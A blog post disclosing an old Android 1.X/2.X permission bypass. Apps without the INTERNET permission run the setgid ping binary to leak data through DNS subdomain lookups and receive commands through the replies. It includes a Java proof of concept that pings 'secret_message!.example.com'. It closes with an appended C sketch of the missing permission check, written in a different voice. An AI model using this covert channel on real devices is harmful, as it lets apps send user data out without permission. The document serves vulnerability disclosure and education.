Saturday, September 20, 2014

INTERNET Permission Bypass via Ping Command for Android 2.X (Sep. 2010)

Note: This article describes an old vulnerability in Android.

Although it was already fixed in Android 4.X, I'd like to write an article about it because I think it is technically very interesting.
I reported it to Google in Sep. 2010 and was told that my report makes no sense and is a waste of time :-( But it looks to have been patched in Nov. 2010 for 3.X and 4.X. Actually, I don't know whether this still works on Android 2.X, because I can't find any discussion about it on the web. But I think it still works on some devices.
I found this bypass on my Xperia SO-01B with Android 1.6. This was my first Android :-)
At that time, most users' Androids were 2.X or 1.X and were affected by this.

Internet Permission
Generally, it is thought that Android handles all Android permissions in Java. However, the Android OS itself also handles this permission through an Android ID (AID_INET, the inet group).
For example, when you use the nc command as an application that has no INTERNET permission, you will see a permission error like the one below:
# su app_31
su app_31
$ nc www.google.co.jp 80
nc www.google.co.jp 80
www.google.co.jp: forward host lookup failed:  : Permission denied
However, the vulnerable ping command allows applications that have no INTERNET permission to run it anyway. Note that when you run a command as an application via adb shell, the permissions differ from the application's actual ones. This is an example of the id command's result for an application without INTERNET permission:
uid=10035(app_35) gid=10035(app_35)
If the application has the INTERNET permission, inet is listed among its groups:
uid=10038(app_38) gid=10038(app_38) groups=3003(inet)
Note: To confirm the groups, run the id command from within an Android application. Don't use adb shell.

Ping command
The ping command requires elevated privilege to send and listen for ICMP control packets on a network interface, and old Android's ping command doesn't check the caller's uid. This means any application can run ping with elevated privilege.
File permissions of ping on Android (note the setgid bit, s, with group net_raw):
-rwxr-sr-x root     net_raw     26708 2011-05-04 23:23 ping
As a result, an attacker can receive the ping packet, but it carries little useful information. However, ping resolves the domain name before sending the packet, because it cannot reach the server without an IP address. If the attacker controls the DNS servers for the domain, he receives the client's DNS query. So an attacker can receive arbitrary messages encoded in a subdomain label, e.g. 'ping message.example.com':

And since the DNS server can respond with arbitrary IP addresses, the client application can receive the attacker's commands in the reply.

PoC:
import java.io.IOException;

import android.app.Activity;
import android.os.Bundle;

public class PingActivity extends Activity {
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_ping);

        // The app declares no INTERNET permission. The message is carried in
        // the hostname label, so the DNS lookup alone delivers it to the
        // domain's name server even if the ICMP packet never arrives.
        Runtime r = Runtime.getRuntime();
        Process p;
        try {
            String message = "secret_message!";
            p = r.exec("ping -c 1 -W 1 " + message + ".example.com");
        } catch (IOException e1) {
            // ping could not be started
        }
        // ping result: the output of p is not read in this PoC
    }
}
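As an added example (my own sketch, not the author's code and not Android's actual patch), this is the check a setgid network helper such as ping was missing: decide on the real caller's group list (AID_INET is 3003, taken from the id output above) before any name resolution, since the lookup itself is the leak. The helper's structure and function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Android's AID_INET gid, taken from the page's "groups=3003(inet)" output. */
#define AID_INET ((gid_t)3003)

/* Does the caller's real gid or supplementary group list contain AID_INET? */
int groups_contain_inet(gid_t real_gid, const gid_t *groups, int count)
{
    if (real_gid == AID_INET)
        return 1;
    for (int i = 0; i < count; i++)
        if (groups[i] == AID_INET)
            return 1;
    return 0;
}

/* Gate for a setgid-net_raw helper (assumed design): decide on the caller's
 * real identity, not on the effective gid the setgid bit granted. */
int caller_has_inet(void)
{
    int n = getgroups(0, NULL);                 /* size of the group list */
    if (n < 0)
        return 0;                               /* fail closed on error */
    gid_t *groups = calloc(n > 0 ? (size_t)n : 1, sizeof *groups);
    if (!groups)
        return 0;
    n = getgroups(n, groups);
    int ok = n >= 0 && groups_contain_inet(getgid(), groups, n);
    free(groups);
    return ok;
}

int main(int argc, char **argv)
{
    const char *host = argc > 1 ? argv[1] : "localhost";
    /* The gate runs before any name resolution: resolving first would already
     * hand the hostname label (the covert channel) to the domain's DNS server. */
    if (!caller_has_inet()) {
        fprintf(stderr, "%s: Permission denied (caller lacks inet)\n", host);
        return 1;
    }
    /* A real ping would now open its ICMP raw socket while still holding
     * net_raw, drop it with setgid(getgid()), and only then resolve host. */
    printf("%s: caller may use the network; resolution would start here\n", host);
    return 0;
}
```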